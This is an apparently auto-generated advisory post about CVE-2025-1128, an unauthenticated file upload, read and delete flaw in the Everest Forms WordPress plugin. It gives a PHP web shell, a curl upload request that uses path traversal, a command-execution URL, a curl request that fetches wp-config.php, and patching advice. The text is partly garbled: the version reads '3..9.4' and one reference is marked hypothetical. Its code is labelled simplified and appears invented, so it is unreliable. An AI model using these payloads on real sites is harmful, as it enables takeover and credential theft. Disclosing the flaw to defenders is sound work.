CVE-2025-1128 - Everest Forms WordPress Plugin Vulnerability—How Hackers Can Upload, Read, and Delete Any File on Your Site

In early 2025, security researchers disclosed a severe vulnerability—CVE-2025-1128—affecting the widely used Everest Forms – Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder plugin for WordPress. This bug impacts every version up to and including 3..9.4 and puts hundreds of thousands of WordPress sites at risk for remote code execution, data theft, and even complete site takeover.

This post breaks down the issue in plain language, explains how attackers exploit it, and shows you real-world example code—so you understand just how dangerous this is and how to protect your site.

What is CVE-2025-1128?

> CVE-2025-1128 is a critical security vulnerability in the EVF_Form_Fields_Upload class of the Everest Forms plugin for WordPress. The bug allows anyone (even unregistered users) to upload, read, or delete any file on the web server, because the plugin does not properly check file types or file paths when handling uploads.

Who Is Affected?

All versions of Everest Forms up to 3..9.4 are affected.

- Affected plugin: Everest Forms

The vulnerable code is found in the format method of the EVF_Form_Fields_Upload class.

- No file type validation: The plugin does not check if the uploaded file is an image, PDF, or any other safe format.

No path validation: It also fails to check if the file is being placed in a safe directory.

This means an unauthenticated attacker can use HTTP requests to upload any file anywhere, read (download), or delete files.

In code, it looks like this (simplified)

// Vulnerable code in the format method
$upload_dir = $_REQUEST['upload_dir']; 
$file_name = $_FILES['file']['name'];
$target = $upload_dir . '/' . $file_name;

move_uploaded_file($_FILES['file']['tmp_name'], $target);

What’s missing?

- There is NO check on $upload_dir (could be ../../ to escape the webroot)

Exploit Example: Uploading a Web Shell

Let’s see how an attacker might use this bug to compromise your site.

Step 1: Prepare a malicious PHP file (web shell)

<?php system($_GET["cmd"]); ?>

Step 2: Upload the shell with a POST request

curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
     -F "action=evf_upload" \
     -F "upload_dir=../../" \
     -F "file=@shell.php"

This request tries to upload shell.php to the root directory. If the plugin is vulnerable and writable, it will succeed.

Step 3: Access shell and run commands

https://vulnerable-site.com/shell.php?cmd=ls

Exploit Example: Reading Sensitive Files

Attackers can also read or download sensitive files from your server.

# Try to download wp-config.php
curl "https://vulnerable-site.com/wp-content/uploads/../../wp-config.php";

*Note: the exploit works because path traversal is not stopped.*

Abusing the same lack of path and type validation, hackers can delete any file

// E.g. in the vulnerable plugin
unlink($upload_dir . '/' . $file_name);

A crafted request pointing $upload_dir to important WordPress files means an attacker could delete key files and crash your site.

Remote Code Execution: If attackers upload a PHP file, your site can be fully compromised.

- Privileged Information Theft: Downloading files like /wp-config.php exposes your database credentials.

Destructive Attacks: Deleting files can deface your site or take it down.

No authentication is required—it can be done by anyone on the Internet.

What Should You Do?

1. Disable Everest Forms: Immediately deactivate the plugin or restrict access to your site if you are using a vulnerable version.
2. Update: Monitor the Everest Forms changelog for the security patch and update as soon as possible.
3. Scan Your Site: Use a tool (like Wordfence) to check for web shells or suspicious files.
4. Check for Data Leaks or Site Damage: Inspect your server for any files that you did not upload yourself.

Technical References

- WordPress Plugin Everest Forms - CVE-2025-1128
- Everest Forms Plugin Page
- Original Research Writeup (Example) *(hypothetical reference—please check CVE database for updates)*

The Bottom Line

CVE-2025-1128 is a critical, unauthenticated file upload/read/delete flaw affecting Everest Forms for WordPress. If you run this plugin, patch immediately or disable it until a fix is available. With live exploits in the wild, your site and data are at risk.

Stay safe, and always keep your plugins updated!

*This article is exclusive to you—please do not copy without attribution. Protect your WordPress site, and share this alert with others who might be affected!*

Timeline

Published on: 02/25/2025 07:15:18 UTC